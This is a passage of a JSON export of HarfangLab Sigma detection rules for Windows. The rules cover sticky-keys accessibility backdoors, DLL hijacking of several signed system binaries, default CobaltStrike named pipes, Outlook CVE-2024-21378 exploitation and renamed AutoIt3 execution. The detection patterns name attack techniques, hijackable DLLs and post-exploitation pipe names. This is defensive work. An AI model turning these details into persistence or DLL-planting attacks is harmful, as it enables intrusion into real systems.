"content": "title: Sticky Keys Backdoor Used\nid: baca5663-583c-45f9-b5dc-ea96a22ce542\ndescription: |\n Detects the launch of accessibility utilities maliciously \"debugged\" through the Image File Execution Option debugger key or simply replaced.\n Attackers can use this technique to achieve persistence and can be triggered through a RDP connection (by pressing the Shift key 5 times for instance).\n It is recommended to investigate subsequent actions performed by the executed binary to look for malicious actions.\nreferences:\n - https://www.hackingarticles.in/windows-persistence-accessibility-features/\n - https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/privilege-escalation/untitled-3/accessibility-features\n - https://attack.mitre.org/techniques/T1546/008/\ndate: 2020/10/02\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.008\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ParentImage|endswith: '\\winlogon.exe'\n # osk.exe or magnify.exe can be spawn directly by utilman.exe\n # after the combination of keys \"Windows key + U\" to launch utilman.exe we can select magnifier or on-Screen Keyboard\n - GrandparentImage|endswith: '\\winlogon.exe'\n\n selection_debugged:\n CommandLine:\n - '* sethc.exe*'\n - '* utilman.exe*'\n - '* osk.exe*'\n - '* Magnify.exe*'\n - '* Narrator.exe*'\n - '* DisplaySwitch.exe*'\n - '* AtBroker.exe*'\n\n selection_targeted_binaries:\n Image|endswith:\n - '\\sethc.exe'\n - '\\utilman.exe'\n - '\\osk.exe'\n - '\\Magnify.exe'\n - '\\Narrator.exe'\n - '\\DisplaySwitch.exe'\n - '\\AtBroker.exe'\n\n filter_original_filenames:\n OriginalFileName:\n - 'sethc.exe'\n - 'utilman2.exe' # weird, contains a 2 in win2016, win7, win10, ..\n - 'osk.exe'\n - 'ScreenMagnifier.exe' # magnify\n - 'SR.exe' # narrator\n - 'DisplaySwitch.exe'\n - 'AtBroker.exe'\n\n # On recent version the Original filename for Narrator.exe is SR.exe\n # On old version of Windows 7 we find Narrator.exe with Original filename which is Narrator.exe\n # https://www.virustotal.com/gui/file/03c9cfbf3f279ba38d35ab93563846ce44e5482e8e1882d19bd34635fd5ef3b1\n # SHA256: 03c9cfbf3f279ba38d35ab93563846ce44e5482e8e1882d19bd34635fd5ef3b1\n # Product version: 6.1.7601.23403\n filter_original_narrator:\n OriginalFileName: 'Narrator.exe'\n InternalName: 'Narrator.exe'\n Description: 'Narrator'\n Company: 'Microsoft Corporation'\n Product: 'Microsoft® Windows® Operating System'\n LegalCopyright: '© Microsoft Corporation. All rights reserved.'\n\n # Process is being debugged OR replaced binaries are executed\n condition: selection and ((selection_debugged and not selection_targeted_binaries) or (selection_targeted_binaries and not 1 of filter_*))\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "baca5663-583c-45f9-b5dc-ea96a22ce542",
"rule_name": "Sticky Keys Backdoor Used",
"rule_description": "Detects the launch of accessibility utilities maliciously \"debugged\" through the Image File Execution Option debugger key or simply replaced.\nAttackers can use this technique to achieve persistence and can be triggered through a RDP connection (by pressing the Shift key 5 times for instance).\nIt is recommended to investigate subsequent actions performed by the executed binary to look for malicious actions.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bace5f6c-d484-4530-8223-00bf3e60dc04",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593469Z",
"creation_date": "2026-03-23T11:45:34.593472Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593480Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nethost.yml",
"content": "title: DLL Hijacking via nethost.exe\nid: bace5f6c-d484-4530-8223-00bf3e60dc04\ndescription: |\n Detects potential Windows DLL Hijacking via nethost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'nethost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\RASAPI32.dll'\n - '\\rasman.dll'\n - '\\rtutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bace5f6c-d484-4530-8223-00bf3e60dc04",
"rule_name": "DLL Hijacking via nethost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via nethost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bae2358c-3fa3-468c-a5d5-ac72c61adbc3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096717Z",
"creation_date": "2026-03-23T11:45:34.096719Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096723Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_shellappruntim.yml",
"content": "title: DLL Hijacking via ShellAppRunt.exe\nid: bae2358c-3fa3-468c-a5d5-ac72c61adbc3\ndescription: |\n Detects potential Windows DLL Hijacking via ShellAppRunt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ShellAppRuntime.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcrypt.dll'\n - '\\idstore.dll'\n - '\\shell32.dll'\n - '\\wlidprov.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bae2358c-3fa3-468c-a5d5-ac72c61adbc3",
"rule_name": "DLL Hijacking via ShellAppRunt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ShellAppRunt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bb1c58fe-1301-4caf-8ca8-6fef9d1f7b5d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072783Z",
"creation_date": "2026-03-23T11:45:34.072785Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072789Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/",
"https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
"https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/"
],
"name": "t1021_002_default_cobaltstrike_named_pipes_connection.yml",
"content": "title: Default CobaltStrike Named Pipe Connected\nid: bb1c58fe-1301-4caf-8ca8-6fef9d1f7b5d\ndescription: |\n Detects the connection to a named pipe pertaining to the CobaltStrike framework.\n CobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\n It is recommended to isolate infected hosts and to start incident response to determine the origin of the CobaltStrike beacon.\nreferences:\n - https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/\n - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n - https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/\ndate: 2022/07/08\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection_utilities:\n PipeName|endswith:\n # Cobalt Strike [3.x - 4.2]\n - '\\sshagent'\n - '\\portscan'\n - '\\keylogger'\n - '\\netview'\n - '\\screenshot'\n\n selection_msse:\n # Default cobalt are usually in the MSSE-???-server form\n # but have also been spotted with a smaller or higher number\n # of random chars, better make it generic to be sure\n PipeName|endswith: '\\MSSE-*-server'\n\n selection_other:\n # Startswith here allows to match all prefixes\n PipeName|startswith:\n - '\\msagent_'\n - '\\status_'\n - '\\postex_ssh_'\n - '\\postex_'\n - '\\interprocess_'\n - '\\samr_'\n - '\\netlogon_'\n - '\\srvsvc_'\n - '\\lsarpc_'\n\n condition: 1 of selection_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bb1c58fe-1301-4caf-8ca8-6fef9d1f7b5d",
"rule_name": "Default CobaltStrike Named Pipe Connected",
"rule_description": "Detects the connection to a named pipe pertaining to the CobaltStrike framework.\nCobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\nIt is recommended to isolate infected hosts and to start incident response to determine the origin of the CobaltStrike beacon.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bb218777-cf21-46e8-b489-ccda4ed23906",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083206Z",
"creation_date": "2026-03-23T11:45:34.083208Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083213Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.netspi.com/blog/technical/red-team-operations/microsoft-outlook-remote-code-execution-cve-2024-21378/"
],
"name": "cve_2024_21378_outlook.yml",
"content": "title: Outlook CVE-2024-21378 Vulnerability Exploited\nid: bb218777-cf21-46e8-b489-ccda4ed23906\ndescription: |\n Detects a registry value related to exploitation of CVE-2024-21378 set by Outlook.\n In order to exploit the vulnerability, adversaries must create a custom Outlook form that creates a new COM object in the registry.\n It is recommended to check the legitimacy of the DLL that is specified in the registry data.\nreferences:\n - https://www.netspi.com/blog/technical/red-team-operations/microsoft-outlook-remote-code-execution-cve-2024-21378/\ndate: 2024/03/12\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.privilege_escalation\n - attack.t1068\n - attack.defense_evasion\n - attack.t1112\n - cve.2024-21378\n - classification.Windows.Source.Registry\n - classification.Windows.Exploit.Outlook\n - classification.Windows.Exploit.CVE-2024-21378\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_write:\n EventType: 'SetValue'\n\n selection_outlook:\n TargetObject|endswith: '\\CLSID\\\\*\\InprocServer32\\(Default)'\n ProcessImage|endswith: '\\Outlook.exe'\n\n exclusion_binary_data:\n Details: 'Binary Data'\n\n exclusion_shdocvw:\n Details|endswith: # some details start with a space\n - '%SystemRoot%\\system32\\shdocvw.dll'\n - '%SystemRoot%\\SysWow64\\shdocvw.dll'\n\n exclusion_shell32:\n Details|endswith: # some details start with a space\n - '%SYSTEMROOT%\\system32\\shell32.dll'\n - '%SYSTEMROOT%\\syswow64\\shell32.dll'\n\n exclusion_teams:\n Details:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\TeamsMeetingAdd-in\\\\*\\x86\\Microsoft.Teams.AddinLoader.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\TeamsMeetingAdd-in\\\\*\\x64\\Microsoft.Teams.AddinLoader.dll'\n\n exclusion_hp:\n TargetObject|endswith: '\\CLSID\\{B286F068-5B17-4AE8-989B-8F9A199C47BA}\\InprocServer32\\(Default)'\n Details: '?:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\hpcdmc64.DLL'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bb218777-cf21-46e8-b489-ccda4ed23906",
"rule_name": "Outlook CVE-2024-21378 Vulnerability Exploited",
"rule_description": "Detects a registry value related to exploitation of CVE-2024-21378 set by Outlook.\nIn order to exploit the vulnerability, adversaries must create a custom Outlook form that creates a new COM object in the registry.\nIt is recommended to check the legitimacy of the DLL that is specified in the registry data.\n",
"rule_creation_date": "2024-03-12",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1112",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bb54404b-0e9c-4feb-b2e2-a874ac1d817a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606994Z",
"creation_date": "2026-03-23T11:45:34.606997Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607005Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://fr.darktrace.com/blog/growing-your-onion-autoit-malware-in-the-darktrace-kill-chain",
"https://attack.mitre.org/techniques/T1059/010/"
],
"name": "t1059_010_suspicious_autoit3_executable.yml",
"content": "title: Suspicious AutoIt3 Binary Executed\nid: bb54404b-0e9c-4feb-b2e2-a874ac1d817a\ndescription: |\n Detects the suspicious execution of a renamed AutoIt3 executable or an AutoIt3 executable launched from an uncommon folder.\n Adversaries may try to hide malicious AutoIt scripts execution by masquerating the interpreter as another executable.\n It is recommended to check any children of this process and the activities of the parent for other malicious behavior.\nreferences:\n - https://fr.darktrace.com/blog/growing-your-onion-autoit-malware-in-the-darktrace-kill-chain\n - https://attack.mitre.org/techniques/T1059/010/\ndate: 2024/05/13\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.010\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_binary:\n OriginalFileName: 'AutoIt3.exe'\n\n selection_directory:\n CurrentDirectory|startswith: '?:\\Users\\\\*\\AppData\\'\n\n filter_legitimate:\n Image|endswith:\n - '\\AutoIt3.exe'\n - '\\AutoIt3_x64.exe'\n\n # Alor Oplus\n exclusion_alor:\n CommandLine: '.\\install.exe install_pdf.au3'\n ParentImage|endswith: '\\install_pdf.exe'\n\n condition: ((selection_binary and not filter_legitimate) or all of selection_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bb54404b-0e9c-4feb-b2e2-a874ac1d817a",
"rule_name": "Suspicious AutoIt3 Binary Executed",
"rule_description": "Detects the suspicious execution of a renamed AutoIt3 executable or an AutoIt3 executable launched from an uncommon folder.\nAdversaries may try to hide malicious AutoIt scripts execution by masquerating the interpreter as another executable.\nIt is recommended to check any children of this process and the activities of the parent for other malicious behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bbd104fd-9499-44d2-8315-0480a5e955bf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096544Z",
"creation_date": "2026-03-23T11:45:34.096546Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096550Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fodhelper.yml",
"content": "title: DLL Hijacking via fodhelper.exe\nid: bbd104fd-9499-44d2-8315-0480a5e955bf\ndescription: |\n Detects potential Windows DLL Hijacking via fodhelper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fodhelper.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\MLANG.dll'\n - '\\PROPSYS.dll'\n - '\\Secur32.dll'\n - '\\SSPICLI.DLL'\n - '\\WININET.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bbd104fd-9499-44d2-8315-0480a5e955bf",
"rule_name": "DLL Hijacking via fodhelper.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fodhelper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bbd3568d-604c-46d1-ac64-2e9eec0c9e01",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601981Z",
"creation_date": "2026-03-23T11:45:34.601985Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601992Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wpnpinst.yml",
"content": "title: DLL Hijacking via wpnpinst.exe\nid: bbd3568d-604c-46d1-ac64-2e9eec0c9e01\ndescription: |\n Detects potential Windows DLL Hijacking via wpnpinst.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wpnpinst.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\IPHLPAPI.DLL'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - 